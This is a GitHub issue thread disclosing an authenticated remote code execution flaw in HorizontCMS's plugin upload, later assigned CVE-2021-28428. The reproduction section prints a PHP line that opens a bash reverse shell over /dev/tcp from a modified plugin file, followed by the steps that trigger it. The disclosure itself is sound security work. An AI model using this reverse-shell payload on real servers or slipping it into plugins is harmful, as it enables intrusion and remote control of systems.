Open bigb0sss opened 3 years ago
Hi @ttimot24,
Hope all is well. Thank you for labeling the issues as security. We are wondering if you are planning to remediate the issues any time soon. If not, would it be okay for us to write a short blog about our findings on the HorizontCMS? Thanks.
Hi @bigb0sss,
I'm planning to fix this security issue. My schedule is a bit busy, so I think it will be fixed in April.
Feel free to write about it on your blog.
Hi @ttimot24,
Hope all is well.
We know you are still busy, but we just wanted to follow up again to see if the issues have been fixed?
If so, would you please point us to the updated code?
Please let us know if you have any questions. Thanks!
Hi @ttimot24,
Hope all is well. CVE-2021-28428 (https://www.cve.org/CVERecord?id=CVE-2021-28428) was assigned for this issue. Thanks again for the prompt fix for the vulnerability.
All the best,
Description of the Issue
One who is able to log into the admin panel can gain Remote Code Execution via uploading a malicious Plugin file via Plugins upload functionality.
Reproduction of the Issue
$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp//9001 0>&1'");
return [ 'successfully_added_location' => $shell, //'Location added succesfully!', 'successfully_deleted_location' => 'Location deleted succesfully!', 'successfully_set_center' => 'Location is successfully set as map center!' ];
Install --> Activate --> Google Maps Plugin is created in the menu bar:
Add location --> Click Save (to initiate the message.php code)
Listener Receiving a Reverse Shell
Root Cause
Please let us know if you have any questions or need further information. Thanks.
Daniel Min & Chi Tran